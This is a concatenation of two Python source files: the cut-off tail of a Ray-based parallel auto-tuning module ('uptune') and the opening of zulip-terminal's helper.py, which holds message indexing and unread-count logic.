# keep meas-interface for tuners
interface = MeasurementInterface(args=args,
manipulator=manipulator,
project_name='tuning',
program_name='tuning',
program_version='0.1')
api = TuningRunManager(interface, args)
return api
def global_report(self, stage, epoch, api, node, cfg, requestor, result, flag=False):
if result < self.best_qors[stage] or self.best_qors[stage] == None:
self.best_qors[stage] = result
if stage == 0: # save best cfg
self.best_config = cfg
with open("best.json", "w") as fp:
json.dump([cfg, result], fp)
flag = True
# remove the config from pending list
if requestor != "seed":
assert cfg in self._pending, str(self._pending)
self._pending.remove(cfg)
api.manipulator.normalize(cfg)
hashv = api.manipulator.hash_config(cfg)
g = GlobalResult(epoch = epoch,
node = node,
data = cfg,
hashv = hashv,
time = datetime.datetime.now(),
technique = requestor,
result = result,
was_the_best = flag)
self._glbsession[stage].add(g)
self._glbsession[stage].flush()
self._glbsession[stage].commit()
return g
def synchronize(self, stage, api, node, epoch):
""" Synchronize results between different bandits """
if epoch == 0: pass
# Get the results from the same epoch of other nodes
q = GlobalResult.extract(self._glbsession[stage], node, epoch)
api.sync(q)
def create_params(self, stage=0):
manipulator = ConfigurationManipulator()
for item in self.params[stage]:
ptype, pname, prange = item
if ptype == "IntegerParameter":
manipulator.add_parameter(IntegerParameter(pname, prange[0], prange[1]))
elif ptype == "EnumParameter":
manipulator.add_parameter(EnumParameter(pname, prange))
self._mapping[pname] = dict([(y,x) for x,y in enumerate(set(prange))])
elif ptype == "FloatParameter":
manipulator.add_parameter(FloatParameter(pname, prange[0], prange[1]))
elif ptype == "LogIntegerParameter":
manipulator.add_parameter(LogIntegerParameter(pname, prange[0], prange[1]))
elif ptype == "PowerOfTwoParameter":
manipulator.add_parameter(PowerOfTwoParameter(pname, prange[0], prange[1]))
elif ptype == "BooleanParameter":
manipulator.add_parameter(BooleanParameter(pname))
elif ptype == "PermutationParameter":
manipulator.add_parameter(PermutationParameter(pname, prange))
else: assert False, "unrecognized type " + ptype
return manipulator
def tempdir(self, name):
self.temp = "ut.temp"
if not os.path.exists(self.temp):
os.mkdir(self.temp)
return os.path.join(self.temp, name)
# Program executor for profiling before tuning
def call_program(self, cmd, limit=None, memory_limit=None):
kwargs = dict()
subenv = os.environ.copy()
subenv["UT_BEFORE_RUN_PROFILE"] = "On"
if limit is float('inf'):
limit = None
if type(cmd) in (str, str):
kwargs['shell'] = True
kwargs['env'] = subenv
killed = False
t0 = time.time()
# save the log for debugging
def target():
out_log = os.path.join(self.tempdir, "ut.profile.log")
err_log = os.path.join(self.tempdir, "ut.profile.err")
file_out = open(out_log, "w")
file_err = open(err_log, "w")
self.process = subprocess.Popen(
cmd, stdout=file_out, stderr=file_err,
preexec_fn=os.setsid,
**kwargs)
self.stdout, self.stderr = self.process.communicate()
thread = threading.Thread(target=target)
thread.start()
thread.join(limit)
if thread.is_alive():
killed = True
# self.process.terminate()
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
self.process.kill()
self.stdout, self.stderr = self.process.communicate()
thread.join()
t1 = time.time()
return {'time': float('inf') if killed else (t1 - t0),
'timeout': killed,
'returncode': self.process.returncode,
'stdout': self.stdout,
'stderr': self.stderr}
def unique(self, api, stage, desired_result):
""" Get a unique desired result. report result if duplicates """
assert desired_result != None, "Invalid Desired Result"
cfg = desired_result.configuration.data
hashv = self.hash_cfg(api, desired_result)
q = GlobalResult.get(self._glbsession[stage], hashv, cfg)
if q == None:
# TODO: fix or remove sql-alchemy
# Check the pandas dataframes
if os.path.exists(self.history):
keys = [ item[1] for item in self.params[0] ]
df = pd.read_csv(self.history)
check = [ df[k]==v for k, v in cfg.items() ]
dup = check.pop()
while len(check) > 0:
dup &= check.pop()
if dup.any():
result = Result(time=1)
api.report_result(desired_result, result)
return False
return True
else:
result = Result(time=q.result)
api.report_result(desired_result, result)
return False
def hash_cfg(self, api, desired_result):
""" Get the hash value of desired_result """
cfg = desired_result.configuration.data
api.manipulator.normalize(cfg)
hashv = api.manipulator.hash_config(cfg)
return hashv
def training(self, model_list, stage=0):
""" Initialize ML models with offline data """
if len(model_list) > 0:
self._valid = True
for item in self.params[stage]:
ptype, pname, prange = item
if ptype == "EnumParameter":
self._mapping[pname] = dict([(y,x+1) for x,y \
in enumerate(sorted(set(prange)))])
from uptune.plugins import models
return copy.deepcopy(models.ensemble(model_list, self._mapping))
return []
def multivoting(self, stage, desired_result):
"""
avergaing predicative scores from self.modesl
return True if the proposal prediction ranks top 30% over history
"""
results = (self._glbsession[stage].query(GlobalResult.result)
.order_by(asc(GlobalResult.result)).all())
if len(results) == 0:
return True
# TODO: decide wether multi-stage use multi-voting or not
return True
threshold = results[0][0] + self._ratio * (results[-1][0] - results[0][0])
scores = [model.inference(desired_result.configuration.data)
for model in self._models]
average = sum(scores) / len(scores)
if average < threshold: return True
else: return False
def resume(self):
# Recover the decoded pattern
if os.path.isfile(self.history):
print("[ INFO ] Found history records. Trying to re-load the search records...")
data = pd.read_csv(self.history)
# Check if the archive is for this tuning task
cols = [ _[1] for _ in self.params[0] ]
if not set(cols).issubset(set(data.columns)):
log.info('archive mismatch. delete archive')
os.system('rm ' + self.history)
return False
columns = data.columns[1:-1]
for col in columns:
if col in self._mapping:
cands = [item[-1] for item in self.params[0] if item[1] == col][0]
mapping = dict([(i+1, cands[i]) for i in range(len(cands))])
data[col].replace(mapping, inplace=True)
def convert(x):
try: return int(x) if not "." in x else float(x)
except: # non-numerical values
try: # convert a perm list
x = x.strip('][').split(', ')
return [int(_) if not "." in _ else float(_) for _ in x]
except: return x
# Report datas to global database
for d in data.values:
d = d[1:-1]; qor = float(d[-1])
cfg = dict([(columns[i], convert(d[i])) for i in range(len(self.params[0]))])
self.global_report(0, 0, self._apis[0], 0, cfg, 'seed', qor)
self._prev = len(data.values) - 1
return len(data.values) - 1
def prune(self, api, stage, desired_result):
""" Prune away duplicate and unpromising proposals """
if self.unique(api, stage, desired_result) == True:
# use ML model pruning
if self._valid == True:
assert len(self._models) > 0, "No model available"
# generate a weighed score from the model ensemble
if self.multivoting(stage, desired_result) == True:
return True
else:
return False
# Checking if the dr is being validated
# TODO: the comparison does not work for object enum
config = desired_result.configuration.data
if config in self._pending:
return False
self._pending.append(desired_result.configuration.data)
return True
return False
# Encode enum iterm into an index number
def encode(self, key, val):
if key in self._mapping:
try:
return self._mapping[key][val]
except:
print(self._mapping, key, value)
raise RuntimeError("key error")
# Permutation type
elif isinstance(val, list):
return [val]
return val
# Async task scheduler
def async_execute(self, template=False):
self._apis = [self.create_tuning(x, 0, self.create_params())
for x in range(self.parallel)]
# Create ray actors
actors = []
for p in range(self.parallel):
name = "uptune_actor_p{}".format(p)
actor = self.cls.options(name=name).remote(p, 0, self.args)
actors.append(actor)
# user specified training data + models
self._models = self.training(self.args.learning_models)
# restore history search result
prev = self.resume()
start_time = time.time()
# the trials that have been validated
trial_num = 0
# all the trails (including running ones)
global_id_base = 0
# accumulate validation qors and report
new_qor_count = 0
# lists saving local validation qors
local_results = []
local_build_times = []
def get_config(task_list, drs):
cfgs = dict()
for index in task_list:
desired_result = None
api = self._apis[index]
while desired_result is None:
try: desired_result = api.get_next_desired_result()
except: desired_result = None
# prune and report back to opentuner database
while self.prune(api, 0, desired_result) == False:
log.warning("duplicate configuration request by %s from node %d",
desired_result.requestor,
self._apis.index(api))
desired_result = api.get_next_desired_result()
drs[index] = desired_result
cfgs[index] = desired_result.configuration.data
return drs
# distribute desired results across nodes
# check the task queue every a few mins
not_reach_limit = True
free_task_list = [ _ for _ in range(self.parallel) ]
keys = [ item[1] for item in self.params[0] ]
# objects list saves the pending tasks
objects = list()
drs = dict()
while not_reach_limit:
# Prepare inputs for free threads
# The new desired result will overwrite the old ones
drs = get_config(free_task_list, drs)
if not template:
measure_num = trial_num
if self._prev and trial_num == 0:
measure_num += (self._prev + 1)
global_id_base += (self._prev + 1)
# Prepare meta-data for searching instances
# Each thread should be assigned with a new global ID
meta = {"UT_MEASURE_NUM": measure_num,
"UT_WORK_DIR": os.path.abspath("../"),
"UT_TEMP_DIR": os.path.abspath("../ut.temp")}
self.publish(drs, stage=0, meta=meta)
# Invoke remote executors
for index in free_task_list:
target_config = drs[index].configuration.data
print(f"[ DEBUG ] GID({global_id_base}) dispatch new task on node {index}: {target_config}")
obj = actors[index].run.remote(drs[index], global_id_base)
objects.append(obj)
global_id_base += 1
free_task_list = []
# List of QoRs returned from the raylet runners
# Format [ index, {co-variates}, eval_time, QoR ]
# Check the executor pool periodically
while True:
qors, not_ready_refs = ray.wait(objects, timeout=self._interval)
objects = not_ready_refs
print("[ DEBUG ] Checking wait time", len(qors), self._interval)
if (len(qors) > 0):
new_qor_count += len(qors)
results, covars, eval_times, gids = [], [], [], []
for qor in qors:
gid, index, covar_list, eval_time, target = ray.get(qor)
print(f"[ DEBUG ] Free node #{index} (GID{gid})")
free_task_list.append(index)
eval_times.append(eval_time)
results.append(target)
covars.append(covar_list)
gids.append(gid)
# Local result logging
local_results.append(target)
local_build_times.append(eval_time)
# Report and synchronize between apis
results = [ Result(time=target) for target in results ]
count = 0
global_results_sync = dict()
for index in free_task_list:
api = self._apis[index]
dr = drs[index]
result = results[count]
build_time = eval_times[count]
covar = covars[count]
gid = gids[count]
api.report_result(dr, result)
gr = self.global_report(0, trial_num, api, index,
dr.configuration.data,
dr.requestor,
result.time)
global_results_sync[index] = gr
# Save res for causal dicovery update
vals = OrderedDict([(key, self.encode(key, dr.configuration.data[key])) for key in keys])
elapsed_time = time.time() - start_time
# Check whether prev result exist
if self._prev and trial_num == 0:
trial_num = trial_num + self._prev + 1
is_best = 1 if result.time == self.best_qors[0] else 0
df = pd.DataFrame({"gid": gid, "time" : elapsed_time, **vals, **covar,
"build_time" : build_time,
"qor" : result.time, "is_best" : is_best},
columns=["gid", "time", *keys, *covar.keys(), "build_time", "qor", "is_best"],
index=[trial_num])
header = ["gid", "time", *keys, *covar.keys(), "build_time", "qor", "is_best"]
df.to_csv(self.history, mode='a', index=False,
header=False if trial_num > 0 else header)
trial_num += 1
count += 1
# Update the new results to other nodes (apis)
for index, gr in global_results_sync.items():
api_count = 0
for api in self._apis:
if api_count != index:
api.sync([gr])
api_count += 1
break
# report local result every self.parallel qors return
if new_qor_count >= self.parallel:
new_qor_count = 0
rets = np.array(local_results)
eval_times = np.array(local_build_times)
try:
local_worst = np.nanmax(rets[rets != np.inf])
local_best = np.nanmin(rets[rets != np.inf])
except:
local_best = float("inf")
local_worst = float("inf")
max_build_time = np.nanmax(eval_times[eval_times != np.inf])
global_best = self.best_qors[0] if self.best_qors else local_best
if local_best < global_best: global_best = local_best
print("[ INFO ] {}(#{}/{})".\
format(str(datetime.timedelta(seconds=int(elapsed_time))),
trial_num, self.search_limit) + \
" - QoR LW({:05.2f})/LB({:05.2f})/GB({:05.2f}) - build time({:05.2f}s)".\
format(local_worst, local_best, global_best, max_build_time))
local_results = []
local_build_times = []
elapsed_time = time.time() - start_time
if trial_num > self.search_limit:
print(trail, self.search_limit)
not_reach_limit = False
if elapsed_time > float(self.args.timeout):
not_reach_limit = False
print(elapsed_time)
if not_reach_limit == False:
print("[ INFO ] Search ends. Global best {}".format(self.best_qors[0]))
# End of execution
for api in self._apis:
api.finish()
return self.best_config
def main(self, template=False):
self._apis = [self.create_tuning(x, 0, self.create_params())
for x in range(self.parallel)]
# Create ray actors
actors = []
for p in range(self.parallel):
name = "uptune_actor_p{}".format(p)
actor = self.cls.options(name=name).remote(p, 0, self.args)
actors.append(actor)
# user specified training data + models
self._models = self.training(self.args.learning_models)
# restore history search result
prev = self.resume()
start_time = time.time()
# the main searching loop
for epoch in range(self.search_limit):
drs, cfgs = list(), list()
for api in self._apis:
desired_result = None
while desired_result is None:
try: desired_result = api.get_next_desired_result()
except: desired_result = None
# prune and report back to opentuner database
while self.prune(api, 0, desired_result) == False:
log.warning("duplicate configuration request by %s from node %d",
desired_result.requestor,
self._apis.index(api))
desired_result = api.get_next_desired_result()
drs.append(desired_result)
cfgs.append(desired_result.configuration.data)
# assert and run in parallel with ray remote
# truncate = lambda x: x + "..." if len(x) > 75 else x
assert len(cfgs) == self.parallel, \
"All available cfgs have been explored"
# distribute desired results across nodes
base = epoch * self.parallel
if not template:
measure_num = base
if self._prev: measure_num += (self._prev + 1)
meta = {"UT_MEASURE_NUM": measure_num,
"UT_WORK_DIR": os.path.abspath("../")}
self.publish(drs, stage=0, meta=meta)
objects = [ actor.run.remote(drs[actors.index(actor)])
for actor in actors ]
# List of QoRs returned from the raylet runners
# Format [ index, {co-variates}, eval_time, QoR ]
# qors = ray.get(objects, timeout=self.args.runtime_limit+10)
# Check the executor pool periodically (5 mins)
interval = 5 * 60
qors, not_ready_refs = ray.wait(objects,
num_returns=self.parallel, timeout=self.args.runtime_limit)
# Dispatch the tasks asynchronously
results, covars, eval_times = [], [], []
for index in range(len(objects)):
item = objects[index]
if item in qors:
index, covar_list, eval_time, target = ray.get(item)
eval_times.append(eval_time)
results.append(target)
covars.append(covar_list)
# Cancel timeed-out tasks
else:
assert item in not_ready_refs, "Not found object ref"
# Kill the dead actor and create a new actor
print("[ WARNING ] Thread #{} timed-out. Creating new actor...".format(index))
del actors[index]
new_actor = self.cls.remote(index, 0, self.args)
actors.insert(index, new_actor)
eval_times.append(float("inf"))
results.append(float("inf"))
covars.append({})
elapsed_time = time.time() - start_time
rets = np.array(results)
eval_times = np.array(eval_times)
local_worst = np.nanmax(rets[rets != np.inf])
local_best = np.nanmin(rets[rets != np.inf])
max_build_time = np.nanmax(eval_times[eval_times != np.inf])
global_best = self.best_qors[0] if self.best_qors else local_best
if local_best < global_best: global_best = local_best
print("[ INFO ] {}(#{}/{})".\
format(str(datetime.timedelta(seconds=int(elapsed_time))),
epoch * self.parallel, self.search_limit) + \
" - QoR LW({:05.2f})/LB({:05.2f})/GB({:05.2f}) - build time({:05.2f}s)".\
format(local_worst, local_best, global_best, max_build_time))
keys = [ item[1] for item in self.params[0] ]
results = [ Result(time=target) for target in results ]
for api, dr, covar, build_time, result \
in zip(self._apis, drs, covars, eval_times, results):
api.report_result(dr, result)
self.global_report(0, epoch, api,
self._apis.index(api),
dr.configuration.data,
dr.requestor,
result.time)
# Save res for causal dicovery update
index = base + drs.index(dr)
vals = OrderedDict([(key, self.encode(key, dr.configuration.data[key])) for key in keys])
# Check whether prev result exist
if self._prev: index = index + self._prev + 1
is_best = 1 if result.time == self.best_qors[0] else 0
df = pd.DataFrame({"time" : elapsed_time, **vals, **covar,
"build_time" : build_time,
"qor" : result.time, "is_best" : is_best},
columns=["time", *keys, *covar.keys(), "build_time", "qor", "is_best"],
index=[index])
header = ["time", *keys, *covar.keys(), "build_time", "qor", "is_best"]
df.to_csv(self.history, mode='a', index=False,
header=False if index > 0 else header)
for api in self._apis: # sync across nodes
self.synchronize(0, api, self._apis.index(api), epoch)
# update causal baysien graph
# if epoch % 10 == 0:
# data = pd.read_csv('../archive.csv')
# data = (data-data.mean())/data.std()
# print(notears(data.values[:, 2:-1]))
# time check and plot diagram
if elapsed_time > float(self.args.timeout):
log.info('%s runtime exceeds timeout %ds. global_best is %f',
str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")),
int(elapsed_time), self.best_qors[0])
break
# End of execution
for api in self._apis:
api.finish()
log.info('%s tuning complete. global_best is %f',
str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")),
self.best_qors[0] if self.best_qors else float('inf'))
return self.best_config
# Fine-grained auto-tuning control
def set_actor_cls(self, actor):
""" Set actor cls from builder and tmpl """
self.cls = actor
def create_instances(self):
""" Create single-stage api controller, ray actors and ML model instances"""
self._actors = [self.cls.remote(_, 0, self.args)
for _ in range(self.parallel)]
self._apis = [self.create_tuning(x, 0, self.create_params())
for x in range(self.parallel)]
self._models = self.training(self.args.learning_models)
def finish_tuning(self):
""" Return best configuration """
best_cfgs = [api.get_best_configuration() for api in self._apis]
for api in self._apis:
try: api.finish()
except: pass
return best_cfgs
def generate_dr(self):
""" Singe-stage generate desired result """
drs, idxs = list(), list()
for api in self._apis:
desired_result = api.get_next_desired_result()
if desired_result is None:
continue
while self.prune(api, 0, desired_result) == False:
log.warning("duplicate configuration request by %s from node %d",
desired_result.requestor,
self._apis.index(api))
desired_result = api.get_next_desired_result()
drs.append(desired_result)
idxs.append(self._apis.index(api))
assert len(drs) == self.parallel, \
"All available cfgs have been explored"
return drs, idxs
def rpt_and_sync(self, epoch, drs, results, mapping=None, stage=0):
""" report and synchronize result """
log.info('Global best qor %f',
self.best_qors[stage] if self.best_qors is not None else float('inf'))
idxs = tuple([mapping[_] for _ in drs]) if mapping else None
apis = [self._apis[i] for i in idxs] if idxs else self._apis
for api, dr, result in zip(apis, drs, results):
api.report_result(dr, result)
self.global_report(stage,
epoch,
api,
self._apis.index(api),
dr.configuration.data,
dr.requestor,
result.time)
for api in self._apis:
self.synchronize(stage, api, self._apis.index(api), epoch)
class RunProgram(object):
"""
Ray Actor to be called by object of ParallelTuning Class
Extending dataflow from functional programming
Reference: https://ray.readthedocs.io/en/latest/actors.html
"""
def __init__(self, index, stage, args=None):
self.index = index
self.stage = stage
self.args = args
self.global_id = 0
self.workpath = None
self.process = None
self.stdout = str()
self.stderr = str()
self.dumper = JinjaParser()
# Invoked by runner before starting tuning
def start_run(self, nodes=1):
# Running tuning tasks in a single-node machine
# when running across multiple compute nodes (not sharing the same FS)
# search instances need to find available nodes
if nodes == 1:
self.workpath = f"temp.{self.index}"
dir_in_use = self.workpath + '-inuse'
if not os.path.isdir(dir_in_use):
os.rename(self.workpath, dir_in_use)
os.chdir(self.workpath + '-inuse')
else:
for folder in next(os.walk('.'))[1]:
if folder.isdigit():
self.workpath = folder
os.rename(folder, folder + '-inuse')
os.chdir(folder + '-inuse')
break
def end_run(self):
os.chdir("../")
os.rename(self.workpath + '-inuse', self.workpath)
def set_global_id(self, global_id):
self.global_id = global_id
def call_program(self, cmd, aws=False, sample=False,
limit=None, memory_limit=None):
kwargs = dict()
subenv = os.environ.copy()
subenv["UT_TUNE_START"] = "True"
subenv["UT_CURR_INDEX"] = str(self.index)
subenv["UT_CURR_STAGE"] = str(self.stage)
subenv["UT_GLOBAL_ID"] = str(self.global_id)
# early exit in multistage & aws
if sample: subenv["UT_MULTI_STAGE_SAMPLE"] = "True"
if aws: subenv["UT_AWS_S3_BUCKET"] = "True"
if limit is float('inf'):
limit = None
if type(cmd) in (str, str):
kwargs['shell'] = True
kwargs['env'] = subenv
killed = False
t0 = time.time()
def target():
out_log = f"../stage{self.stage}_node{self.index}.out"
err_log = f"../stage{self.stage}_node{self.index}.err"
file_out = open(out_log, "a+")
file_err = open(err_log, "a+")
self.process = subprocess.Popen(
cmd, stdout=file_out, stderr=file_err,
preexec_fn=os.setsid,
**kwargs)
self.stdout, self.stderr = self.process.communicate()
thread = threading.Thread(target=target)
thread.start()
thread.join(limit)
if thread.is_alive():
killed = True
# self.process.terminate()
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
self.process.kill()
self.stdout, self.stderr = self.process.communicate()
thread.join()
t1 = time.time()
return {'time': float('inf') if killed else (t1 - t0),
'timeout': killed,
'returncode': self.process.returncode,
'stdout': self.stdout,
'stderr': self.stderr}
def run(self, dr):
raise RuntimeError("ParallelTuning.run() not implemented")
# Expr for Functional Module Reuse
class ProgramTune(ParallelTuning):
def __init__(self, cls, args, *pargs, **kwargs):
super(ProgramTune, self).__init__(cls, args, *pargs, **kwargs)
self.prepare_workdir()
@ray.remote
class SingleProcess(RunProgram):
def run(self, dr):
import random
os.system('sleep 10')
return random.randint(0, 10)
if __name__ == '__main__':
argparser = uptune.default_argparser()
pt = ProgramTune(SingleProcess, argparser.parse_args())
pt.main()
|
helper.py | import os
import platform
import subprocess
import time
from collections import OrderedDict, defaultdict
from functools import wraps
from itertools import chain, combinations
from re import ASCII, MULTILINE, findall, match
from threading import Thread
from typing import (
Any, Callable, DefaultDict, Dict, FrozenSet, Iterable, List, Set, Tuple,
TypeVar, Union,
)
from urllib.parse import unquote
import lxml.html
from typing_extensions import Literal, TypedDict
MACOS = platform.system() == "Darwin"
LINUX = platform.system() == "Linux"
WSL = 'microsoft' in platform.release().lower()
StreamData = TypedDict('StreamData', {
'name': str,
'id': int,
'color': str,
'invite_only': bool,
'description': str,
})
EmojiData = TypedDict('EmojiData', {
'code': str,
'type': Literal['realm_emoji', 'unicode_emoji',
'zulip_extra_emoji'],
})
NamedEmojiData = Dict[str, EmojiData]
Message = TypedDict('Message', {
'id': int,
'sender_id': int,
'content': str,
'recipient_id': int,
'timestamp': int,
'client': str,
'subject': str, # Only for stream msgs.
'topic_links': List[str],
'is_me_message': bool,
'reactions': List[Dict[str, Any]],
'submessages': List[Dict[str, Any]],
'flags': List[str],
'sender_full_name': str,
'sender_short_name': str,
'sender_email': str,
'sender_realm_str': str,
'display_recipient': Any,
'type': str,
'stream_id': int, # Only for stream msgs.
'avatar_url': str,
'content_type': str,
'match_content': str, # If keyword search specified in narrow params.
'match_subject': str, # If keyword search specified in narrow params.
}, total=False)
Index = TypedDict('Index', {
'pointer': Dict[str, Union[int, Set[None]]], # narrow_str, message_id
# Various sets of downloaded message ids (all, starred, ...)
'all_msg_ids': Set[int],
'starred_msg_ids': Set[int],
'mentioned_msg_ids': Set[int],
'private_msg_ids': Set[int],
'private_msg_ids_by_user_ids': Dict[FrozenSet[int], Set[int]],
'stream_msg_ids_by_stream_id': Dict[int, Set[int]],
'topic_msg_ids': Dict[int, Dict[str, Set[int]]],
# Extra cached information
'edited_messages': Set[int], # {message_ids, ...}
'topics': Dict[int, List[str]], # {topic names, ...}
'search': Set[int], # {message_id, ...}
# Downloaded message data
'messages': Dict[int, Message], # message_id: Message
})
initial_index = Index(
pointer=defaultdict(set),
all_msg_ids=set(),
starred_msg_ids=set(),
mentioned_msg_ids=set(),
private_msg_ids=set(),
private_msg_ids_by_user_ids=defaultdict(set),
stream_msg_ids_by_stream_id=defaultdict(set),
topic_msg_ids=defaultdict(dict),
edited_messages=set(),
topics=defaultdict(list),
search=set(),
# mypy bug: https://github.com/python/mypy/issues/7217
messages=defaultdict(lambda: Message()),
)
UnreadCounts = TypedDict('UnreadCounts', {
'all_msg': int,
'all_pms': int,
'all_mentions': int,
'unread_topics': Dict[Tuple[int, str], int], # stream_id, topic
'unread_pms': Dict[int, int], # sender_id
'unread_huddles': Dict[FrozenSet[int], int], # Group pms
'streams': Dict[int, int], # stream_id
})
edit_mode_captions = {
'change_one': 'Change only this message topic',
'change_later': 'Also change later messages to this topic',
'change_all': 'Also change previous and following messages to this topic',
}
def asynch(func: Callable[..., None]) -> Callable[..., None]:
"""
Decorator for executing a function in a separate :class:`threading.Thread`.
"""
@wraps(func)
def wrapper(*args: Any, **kwargs: Any) -> Any:
# If calling when pytest is running simply return the function
# to avoid running in asynch mode.
if os.environ.get("PYTEST_CURRENT_TEST"):
return func(*args, **kwargs)
thread = Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
return thread.start()
return wrapper
def _set_count_in_model(new_count: int, changed_messages: List[Message],
unread_counts: UnreadCounts) -> None:
"""
This function doesn't explicitly set counts in model,
but updates `unread_counts` (which can update the model
if it's passed in, but is not tied to it).
"""
# broader unread counts (for all_*) are updated
# later conditionally in _set_count_in_view.
KeyT = TypeVar('KeyT')
def update_unreads(unreads: Dict[KeyT, int], key: KeyT) -> None:
if key in unreads:
unreads[key] += new_count
if unreads[key] == 0:
unreads.pop(key)
elif new_count == 1:
unreads[key] = new_count
for message in changed_messages:
if message['type'] == 'stream':
stream_id = message['stream_id']
update_unreads(unread_counts['unread_topics'],
(stream_id, message['subject']))
update_unreads(unread_counts['streams'], stream_id)
# self-pm has only one display_recipient
# 1-1 pms have 2 display_recipient
elif len(message['display_recipient']) <= 2:
update_unreads(unread_counts['unread_pms'], message['sender_id'])
else: # If it's a group pm
update_unreads(unread_counts['unread_huddles'],
frozenset(recipient['id'] for recipient
in message['display_recipient']))
def _set_count_in_view(controller: Any, new_count: int,
changed_messages: List[Message],
unread_counts: UnreadCounts) -> None:
"""
This function for the most part contains the logic for setting the
count in the UI buttons. The later buttons (all_msg, all_pms)
additionally set the current count in the model and make use of the
same in the UI.
"""
stream_buttons_log = controller.view.stream_w.log
is_open_topic_view = controller.view.left_panel.is_in_topic_view
if is_open_topic_view:
topic_buttons_log = controller.view.topic_w.log
toggled_stream_id = controller.view.topic_w.stream_button.stream_id
user_buttons_log = controller.view.user_w.log
all_msg = controller.view.home_button
all_pm = controller.view.pm_button
all_mentioned = controller.view.mentioned_button
for message in changed_messages:
user_id = message['sender_id']
# If we sent this message, don't increase the count
if user_id == controller.model.user_id:
continue
msg_type = message['type']
add_to_counts = True
if 'mentioned' in message['flags']:
unread_counts['all_mentions'] += new_count
all_mentioned.update_count(unread_counts['all_mentions'])
if msg_type == 'stream':
stream_id = message['stream_id']
msg_topic = message['subject']
if controller.model.is_muted_stream(stream_id):
add_to_counts = False # if muted, don't add to eg. all_msg
else:
for stream_button in stream_buttons_log:
if stream_button.stream_id == stream_id:
stream_button.update_count(stream_button.count
+ new_count)
break
# FIXME: Update unread_counts['unread_topics']?
if controller.model.is_muted_topic(stream_id, msg_topic):
add_to_counts = False
if is_open_topic_view and stream_id == toggled_stream_id:
# If topic_view is open for incoming messages's stream,
# We update the respective TopicButton count accordingly.
for topic_button in topic_buttons_log:
if topic_button.topic_name == msg_topic:
topic_button.update_count(topic_button.count
+ new_count)
else:
for user_button in user_buttons_log:
if user_button.user_id == user_id:
user_button.update_count(user_button.count + new_count)
break
unread_counts['all_pms'] += new_count
all_pm.update_count(unread_counts['all_pms'])
if add_to_counts:
unread_counts['all_msg'] += new_count
all_msg.update_count(unread_counts['all_msg'])
def set_count(id_list: List[int], controller: Any, new_count: int) -> None:
# This method applies new_count for 'new message' (1) or 'read' (-1)
# (we could ensure this in a different way by a different type)
assert new_count == 1 or new_count == -1
messages = controller.model.index['messages']
unread_counts = controller.model.unread_counts # type: UnreadCounts
changed_messages = [messages[id] for id in id_list]
_set_count_in_model(new_count, changed_messages, unread_counts)
# if view is not yet loaded. Usually the case when first message is read.
while not hasattr(controller, 'view'):
time.sleep(0.1)
_set_count_in_view(controller, new_count, changed_messages, unread_counts)
while not hasattr(controller, 'loop'):
time.sleep(0.1)
controller.update_screen()
def index_messages(messages: List[Message],
model: Any,
index: Index) -> Index:
"""
STRUCTURE OF INDEX
{
'pointer': {
'[]': 30 # str(ZulipModel.narrow)
'[["stream", "verona"]]': 32,
...
}
'topic_msg_ids': {
123: { # stream_id
'topic name': {
51234, # message id
56454,
...
}
},
'private_msg_ids_by_user_ids': {
(3, 7): { # user_ids frozenset
51234,
56454,
...
},
(1, 2, 3, 4): { # multiple recipients
12345,
32553,
}
},
'topics': {
123: [ # stread_id
'Denmark2', # topic name
'Verona2',
....
]
},
'all_msg_ids': {
14231,
23423,
...
},
'private_msg_ids': {
22334,
23423,
...
},
'mentioned_msg_ids': {
14423,
33234,
...
},
'stream_msg_ids_by_stream_id': {
123: {
53434,
36435,
...
}
234: {
23423,
23423,
...
}
},
'edited_messages':{
51234,
23423,
...
},
'search': {
13242,
23423,
23423,
...
},
'messages': {
# all the messages mapped to their id
# for easy retrieval of message from id
45645: { # PRIVATE
'id': 4290,
'timestamp': 1521817473,
'content': 'Hi @**Cordelia Lear**',
'sender_full_name': 'Iago',
'flags': [],
'sender_short_name': 'iago',
'sender_email': 'iago@zulip.com',
'subject': '',
'subject_links': [],
'sender_id': 73,
'type': 'private',
'recipient_id': 124,
'reactions': [],
'display_recipient': [
{
'email': 'ZOE@zulip.com',
'id': 70,
'full_name': 'Zoe',
}, {
'email': 'cordelia@zulip.com',
'id': 71,
'full_name': 'Cordelia Lear',
}, {
'email': 'hamlet@zulip.com',
'id': 72,
'full_name': 'King Hamlet',
}, {
'email': 'iago@zulip.com',
'id': 73,
'full_name': 'Iago',
}
]
},
45645: { # STREAM
'timestamp': 1521863062,
'sender_id': 72,
'sender_full_name': 'King Hamlet',
'recipient_id': 119,
'content': 'https://github.com/zulip/zulip-terminal',
'type': 'stream',
'sender_email': 'hamlet@zulip.com',
'id': 4298,
'display_recipient': 'Verona',
'flags': [],
'reactions': [],
'subject': 'Verona2',
'stream_id': 32,
},
},
}
"""
narrow = model.narrow
for msg in messages:
if 'edit_history' in msg.keys():
index['edited_messages'].add(msg['id'])
index['messages'][msg['id']] = msg
if not narrow:
index['all_msg_ids'].add(msg['id'])
elif model.is_search_narrow():
index['search'].add(msg['id'])
continue
if len(narrow) == 1:
if narrow[0][1] == 'starred':
if 'starred' in msg['flags']:
index['starred_msg_ids'].add(msg['id'])
if narrow[0][1] == 'mentioned':
if 'mentioned' in msg['flags']:
index['mentioned_msg_ids'].add(msg['id'])
if msg['type'] == 'private':
index['private_msg_ids'].add(msg['id'])
recipients = frozenset({
recipient['id'] for recipient in msg['display_recipient']
})
if narrow[0][0] == 'pm_with':
narrow_emails = ([model.user_dict[email]['user_id']
for email in narrow[0][1].split(', ')]
+ [model.user_id])
if recipients == frozenset(narrow_emails):
(index['private_msg_ids_by_user_ids'][recipients]
.add(msg['id']))
if msg['type'] == 'stream' and msg['stream_id'] == model.stream_id:
(index['stream_msg_ids_by_stream_id'][msg['stream_id']]
.add(msg['id']))
if (msg['type'] == 'stream' and len(narrow) == 2
and narrow[1][1] == msg['subject']):
topics_in_stream = index['topic_msg_ids'][msg['stream_id']]
if not topics_in_stream.get(msg['subject']):
topics_in_stream[msg['subject']] = set()
topics_in_stream[msg['subject']].add(msg['id'])
return index
def classify_unread_counts(model: Any) -> UnreadCounts:
# TODO: support group pms
unread_msg_counts = model.initial_data['unread_msgs']
unread_counts = UnreadCounts(
all_msg=0,
all_pms=0,
all_mentions=0,
unread_topics=dict(),
